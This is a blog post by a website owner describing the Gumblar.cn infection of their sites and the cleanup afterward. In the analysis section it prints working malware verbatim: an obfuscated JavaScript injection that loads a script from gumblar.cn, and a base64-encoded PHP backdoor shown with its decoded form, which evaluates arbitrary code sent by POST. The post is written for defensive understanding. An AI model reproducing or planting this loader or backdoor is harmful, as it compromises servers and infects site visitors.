macport so sweet! Mac’s Zoom Button vs Window’s Maximize Button
May 27

DeWorm

DeWorm

Ouch, some of my sites were attacked by Gumblar.cn exploit, and blacklisted by Google.
What it does is injecting malicious codes into .html, .php, .aspx and .js files, usually some snippet of javascript in the header right before the body tag in .html and .aspx files, and at the bottom of the .php and .js files. It will also generate a image.php and gifimg.php file in the images directory. It will do so randomly anywhere on the website. PC users visiting the site could be compromised.
First thing to do is to change ftp password, a stronger password would help. Then it takes me a long time to scrub through the sites, using scripts, search and replace, delete, ftp, to find and delete those scripts, and then about a day for Google to review the site again. Linux really help in this case in cleaning it up through command line, but not so with PC servers, where each file have to be checked manually.

Some analysis…
Here is one sample of the various injections :
var maV3C='%';var nW5R='var"20a"3d"22Scri"70t"45"6eg"69ne"22"2cb"3d"22Ver"73ion()+"22"2cj"3d"22"22"2c"75"3dn"61vig"61tor
"2e"75serA"67e"6et"3bif"28(u"2ei"6edex"4f"66"28"22W"69n"22)"3e0"29"26"26"28"75"2ein"64"65xOf"28"22"4e"54"206"22)"3c0)"26"26("64ocument"2e
cookie"2ein"64"65xOf("22m"69ek"3d"31"22)"3c"30)"26"26(t"79peof("7arvz"74s)"21"3d"74"79"70"65of"28"22"41"22"29"29)"7bz"72v"7ats"3d"22A"22"
3bev"61"6c("22i"66"28win"64ow"2e"22+a+"22"29"6a"3dj+"22"2b"61"2b"22"4daj"6fr"22+b+a+"22Minor"22+b"2b"61"2b"22Bui"6cd"22+"62"2b"22j"3b"22"
29"3b"64ocu"6dent"2e"77"72"69te("22"3cscript"20s"72c"3d"2f"2f"67u"6dbl"61r"2ecn"2frs"73"2f"3fid"3d"22+"6a+"22"3e"3c"5c"2fscri"70"74"3e"22
)"3b"7d';eval(unescape(nW5R.replace(b5nxj,maV3C)))})(/"/g);

This is the backdoor script in the image.php or gifimg.php file :
eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzM2MzQyYjMxMzgzNzJlMzIzMDMxMmUzMjMyMzUzYTdhNjk2MzZmNmM2MTNlNzA2NTc0NjQ3MjZjNjEnOw=='));

When decoded, here is the actual php script :
if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo ‘36342b3138372e3230312e3232353a7a69636f6c613e70657464726c61′;

As you can see, it can run any php commands through that file on your server.

Here are a list of links related to the Gumblar trojan :
Gumblar explode across the Web
Beware of the Gumblar Worm
PHP exploit on the loose
12 Facts about the Gumblar Exploit
Removal and Prevention of Gumblar

Hope this helps.
What a pain… and 2 days wasted for no reason.

Please help share it: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • Facebook
  • Google
  • Furl
  • TwitThis
  • Haohao

Leave a Reply

FireStats iconPowered by FireStats